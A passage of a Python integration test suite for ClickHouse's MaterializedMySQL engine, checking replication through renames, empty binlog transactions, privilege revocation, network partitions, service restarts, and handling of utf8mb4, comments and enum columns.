    check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
    check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query(
        "ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
    check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
                "id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
    check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
    clickhouse_node.query("DROP DATABASE test_database_rename_table")
    mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
    """Verify that empty transactions in the binlog are tolerated.

    Manufactures (a) an empty GTID transaction via explicit SET gtid_next
    + BEGIN/COMMIT and (b) a BEGIN/COMMIT pair wrapped in comments, then
    checks replication still works and no rows are lost.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
    mysql_node.query("CREATE DATABASE test_database_event")
    # RESET MASTER so the Executed_Gtid_Set parsed below has a single,
    # predictable uuid:begin-end range.
    mysql_node.query("RESET MASTER")
    mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
    mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
    clickhouse_node.query(
        "CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
            service_name))
    # Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
    mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
    mysql_cursor.execute("SHOW MASTER STATUS")
    # Executed_Gtid_Set looks like 'uuid:first-last'; take the next seqno.
    (uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
    (seq_begin, seq_end) = seqs.split("-")
    next_gtid = uuid + ":" + str(int(seq_end) + 1)
    mysql_node.query("SET gtid_next='" + next_gtid + "'")
    mysql_node.query("BEGIN")
    mysql_node.query("COMMIT")
    mysql_node.query("SET gtid_next='AUTOMATIC'")
    # Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
    mysql_node.query("/* start */ begin /* end */")
    mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
    mysql_node.query("/* start */ commit /* end */")
    check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
    check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
    clickhouse_node.query("DROP DATABASE test_database_event")
    mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
    """Verify column-less / virtual-column SELECTs on a MaterializedMySQL table.

    Stops merges so the ReplacingMergeTree versions stay unmerged, then
    checks count()/count(*) and _sign/_version/_part access through the
    table itself, a view, merge() and remote().
    """
    mysql_node.query("DROP DATABASE IF EXISTS db")
    clickhouse_node.query("DROP DATABASE IF EXISTS db")
    mysql_node.query("CREATE DATABASE db")
    mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
    # Huge max_flush_data_time keeps rows buffered until a DDL forces a flush.
    clickhouse_node.query(
        "CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
    clickhouse_node.query("SYSTEM STOP MERGES db.t")
    clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
    mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
    mysql_node.query("DELETE FROM db.t WHERE a = 2;")
    # We need to execute a DDL for flush data buffer
    mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
    # Raw (unmerged) row counts differ depending on optimize_on_insert.
    optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
    if optimize_on_insert == "0":
        res = ["3\n", "2\n", "2\n"]
    else:
        res = ["2\n", "2\n", "1\n"]
    check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
    assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
    assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
    # Plain count() must see only the final (collapsed) single row.
    assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
    assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
    assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
    clickhouse_node.query("DROP VIEW v")
    clickhouse_node.query("DROP DATABASE db")
    mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
    """Verify replication keeps working while MySQL's global binlog_checksum
    setting is flipped (NONE <-> CRC32) between inserts: every row inserted
    under either setting must reach the ClickHouse replica."""
    mysql_node.query("CREATE DATABASE test_checksum")
    mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
    clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")

    # Turn binlog checksums off and confirm the next event is still applied.
    mysql_node.query("SET GLOBAL binlog_checksum=NONE")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")

    # And back to CRC32 checksums.
    mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
    mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
    check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")

    # Cleanup.
    clickhouse_node.query("DROP DATABASE test_checksum")
    mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check MaterializedMySQL behavior as the MySQL user's privileges are
    progressively revoked: replication works with the minimal grant set,
    degrades to an empty database without REPLICATION SLAVE / REPLICATION
    CLIENT / RELOAD, and ATTACH fails outright once SELECT is revoked."""
    clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
    mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
    mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
    # 'test' user starts with the minimal privilege set replication needs.
    mysql_node.create_min_priv_user("test", "123")
    mysql_node.result("SHOW GRANTS FOR 'test'@'%';")

    # Full minimal privileges: initial dump and incremental sync both work.
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
    mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
    check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
    clickhouse_node.query("DROP DATABASE priv_err_db;")

    # Without REPLICATION SLAVE: the database is created but no table syncs.
    mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
    assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
    clickhouse_node.query("DROP DATABASE priv_err_db")

    # Additionally without REPLICATION CLIENT and RELOAD: same degraded state.
    mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
    assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
    clickhouse_node.query("DETACH DATABASE priv_err_db")

    # Without SELECT on the source database, re-attaching must fail.
    mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
    time.sleep(3)  # give MySQL a moment to apply the revoke before ATTACH
    with pytest.raises(QueryRuntimeException) as exception:
        clickhouse_node.query("ATTACH DATABASE priv_err_db")
    assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
    assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")

    # Restoring SELECT makes ATTACH succeed again.
    mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
    time.sleep(3)
    clickhouse_node.query("ATTACH DATABASE priv_err_db")

    # Cleanup.
    clickhouse_node.query("DROP DATABASE priv_err_db")
    mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
    mysql_node.query("DROP DATABASE priv_err_db;")
    mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
    """Undo drop_instance_mysql_connections: delete the two partition-manager
    rules (both directions, port 3306) and give things time to settle."""
    pm._check_instance(clickhouse_node)
    node_ip = clickhouse_node.ip_address
    outbound = {'source': node_ip, 'destination_port': 3306, 'action': action}
    inbound = {'destination': node_ip, 'source_port': 3306, 'action': action}
    for rule in (outbound, inbound):
        pm._delete_rule(rule)
    time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
    """Cut MySQL traffic for the node: add partition-manager rules blocking
    port 3306 in both directions, then give things time to settle."""
    pm._check_instance(clickhouse_node)
    node_ip = clickhouse_node.ip_address
    outbound = {'source': node_ip, 'destination_port': 3306, 'action': action}
    inbound = {'destination': node_ip, 'source_port': 3306, 'action': action}
    for rule in (outbound, inbound):
        pm._add_rule(rule)
    time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
    """Partition ClickHouse from MySQL and verify: no data is lost (the insert
    made during the partition arrives after healing), creating a new
    MaterializedMySQL database fails while partitioned, and everything works
    again once connectivity is restored."""
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
    clickhouse_node.query("DROP DATABASE IF EXISTS test")
    mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
    mysql_node.query("DROP DATABASE IF EXISTS test")
    mysql_node.query("CREATE DATABASE test_database_network;")
    mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("CREATE DATABASE test;")

    clickhouse_node.query(
        "CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')

    with PartitionManager() as pm:
        # Block port 3306 in both directions, then write on the MySQL side.
        drop_instance_mysql_connections(clickhouse_node, pm)
        mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
        # The row cannot be replicated while partitioned.
        check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')

        # Creating a new MaterializedMySQL database must fail outright.
        with pytest.raises(QueryRuntimeException) as exception:
            clickhouse_node.query(
                "CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
        assert "Can't connect to MySQL server" in str(exception.value)

        # Heal the partition: the buffered insert is delivered.
        restore_instance_mysql_connections(clickhouse_node, pm)
        check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')

        # Database creation works again after healing.
        clickhouse_node.query(
            "CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
        check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
        mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
        check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")

        # Cleanup.
        clickhouse_node.query("DROP DATABASE test_database_network")
        clickhouse_node.query("DROP DATABASE test")
        mysql_node.query("DROP DATABASE test_database_network")
        mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
    """Kill the MySQL binlog-dump threads serving replication and verify that:
    * the database created with max_wait_time_when_mysql_unavailable=-1 (no
      retry) fails queries until it is DETACHed and re-ATTACHed;
    * the database with default settings recovers on its own."""
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
    mysql_node.query("DROP DATABASE IF EXISTS test_database;")
    mysql_node.query("CREATE DATABASE test_database;")
    mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")

    mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
    mysql_node.query("CREATE DATABASE test_database_auto;")
    mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")

    # test_database: never retries on MySQL loss; test_database_auto: defaults.
    clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
    clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
    check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')

    # Being able to query the dumped history does not yet prove the sync
    # thread is connected to MySQL, so insert more rows and re-check that
    # incremental sync works too.
    mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
    mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
    check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')

    # Find and kill every MySQL thread currently streaming binlog to a replica.
    get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
    result = mysql_node.query_and_get_data(get_sync_id_query)
    assert len(result) > 0
    for row in result:
        query = "kill " + str(row[0]) + ";"
        mysql_node.query(query)

    with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
        # https://dev.mysql.com/doc/refman/5.7/en/kill.html
        # When you use KILL, a thread-specific kill flag is set for the thread.
        # In most cases, it might take some time for the thread to die because
        # the kill flag is checked only at specific intervals, hence the
        # growing sleeps between query attempts.
        for sleep_time in [1, 3, 5]:
            time.sleep(sleep_time)
            clickhouse_node.query("SELECT * FROM test_database.test_table")

    # DETACH/ATTACH restarts replication for the no-retry database.
    clickhouse_node.query("DETACH DATABASE test_database")
    clickhouse_node.query("ATTACH DATABASE test_database")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
    mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')

    # The default-settings database reconnected without any intervention.
    mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
    check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')

    # Cleanup.
    clickhouse_node.query("DROP DATABASE test_database")
    clickhouse_node.query("DROP DATABASE test_database_auto")
    mysql_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
    """Restart the MySQL service while a background thread keeps inserting;
    once MySQL is back, DETACH/ATTACH the database and check that ClickHouse
    converges to whatever row count MySQL actually retained."""
    mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
    clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
    mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
    mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')

    try:
        def insert(num):
            # Single-row inserts so the MySQL restart lands mid-stream.
            for i in range(num):
                query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
                mysql_node.query(query)

        t = threading.Thread(target=insert, args=(10000,))
        t.start()
        # NOTE(review): `t` is never joined; it may still be running (and
        # failing) after this function returns.

        # Restart MySQL while the writer thread is still going.
        clickhouse_node.cluster.restart_service(service_name)
    finally:
        # With max_wait_time_when_mysql_unavailable=-1 the database does not
        # retry, so querying it right after the restart must fail.
        with pytest.raises(QueryRuntimeException) as exception:
            time.sleep(2)
            clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")

        # Re-establish this test's own connection to the restarted MySQL.
        mysql_node.alloc_connection()

        # DETACH/ATTACH restarts replication for the no-retry database.
        clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
        clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")

        # MySQL's surviving row count is the ground truth for the replica.
        result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
        for row in result:
            res = str(row[0]) + '\n'
        check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)

        # Cleanup.
        mysql_node.query("DROP DATABASE kill_mysql_while_insert")
        clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
    """Kill and restart ClickHouse while MySQL keeps inserting rows; after the
    restart the replica must converge to MySQL's final row count."""
    mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
    mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
    mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    clickhouse_node.query(f"CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{service_name}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')")
    check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')

    def keep_inserting(total):
        # Sequential single-row inserts on the MySQL side, ids 1..total.
        for row_id in range(1, total + 1):
            mysql_node.query(f"INSERT INTO kill_clickhouse_while_insert.test VALUES({row_id});")

    writer = threading.Thread(target=keep_inserting, args=(1000,))
    writer.start()

    # TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
    clickhouse_node.restart_clickhouse(20, kill=True)
    writer.join()

    # Whatever MySQL ended up with is the expected count on the replica.
    result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
    for row in result:
        res = f"{row[0]}\n"
    check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)

    mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
    clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
    """Replicate rows containing 4-byte UTF-8 characters from a utf8mb4 MySQL
    table and check they round-trip into ClickHouse unchanged."""
    mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
    mysql_node.query("CREATE DATABASE utf8mb4_test")
    mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
    # U+1F984 (4-byte encoding) and U+2601 (3-byte) cover both widths.
    mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
    clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
    check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
    # NOTE(review): unlike sibling tests there is no DROP DATABASE cleanup here.
def system_parts_test(clickhouse_node, mysql_node, service_name):
    """Check that a MaterializedMySQL table's parts show up in system.parts:
    each replicated insert adds an active part and OPTIMIZE merges them."""
    mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
    mysql_node.query("CREATE DATABASE system_parts_test")
    mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")

    def assert_active_parts(expected):
        # Count only active (not merged-away) parts of the replicated table.
        check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", f"{expected}\n")

    clickhouse_node.query(f"CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{service_name}:3306', 'system_parts_test', 'root', 'clickhouse')")
    assert_active_parts(1)
    mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
    assert_active_parts(2)
    clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
    assert_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
    """Replicate a MySQL multi-table UPDATE (one statement modifying rows in
    two tables) and check both ClickHouse tables reflect the new values."""
    mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
    clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
    mysql_node.query("CREATE DATABASE multi_table_update")
    mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
    mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
    mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
    mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
    clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
    # Single UPDATE statement touching both tables at once.
    mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
    check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
    check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
    # NOTE(review): no DROP DATABASE cleanup here, unlike sibling tests.
def system_tables_test(clickhouse_node, mysql_node, service_name):
    """Check the metadata MaterializedMySQL reports in system.tables for a
    replicated table: partition key, sorting key and primary key."""
    mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
    mysql_node.query("CREATE DATABASE system_tables_test")
    mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
    clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
    # Expected: partition key intDiv(id, 4294967); the MySQL primary key `id`
    # is used as both sorting key and primary key.
    check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
    """Check MySQL column comments are carried into the ClickHouse replica and
    track ALTER ... MODIFY (comment change) and ALTER ... ADD (new column)."""
    mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
    mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
    mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
    clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
    # Initial comment is visible in DESCRIBE output.
    check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Changing the comment via MODIFY is replicated.
    mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
    check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # A newly added column brings its comment along.
    mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
    check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
    # Cleanup.
    clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
    mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
    """Replicate a MySQL ENUM column with 127 entries and check it appears as
    Nullable(Enum8(...)) on the ClickHouse side, with values syncing."""
    mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
    mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
    enum8_values_count = 127
    # "'1', '2', ..., '127'" -- the ENUM list used in the MySQL DDL.
    enum8_values = ", ".join(f"'{i}'" for i in range(1, enum8_values_count + 1))
    # "\'1\' = 1, ..." -- the escaped form DESCRIBE TABLE prints back.
    enum8_values_with_backslash = ", ".join(f"\\'{i}\\' = {i}" for i in range(1, enum8_values_count + 1))
    mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
    mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
    clickhouse_node.query(f"CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{service_name}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')")
    check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
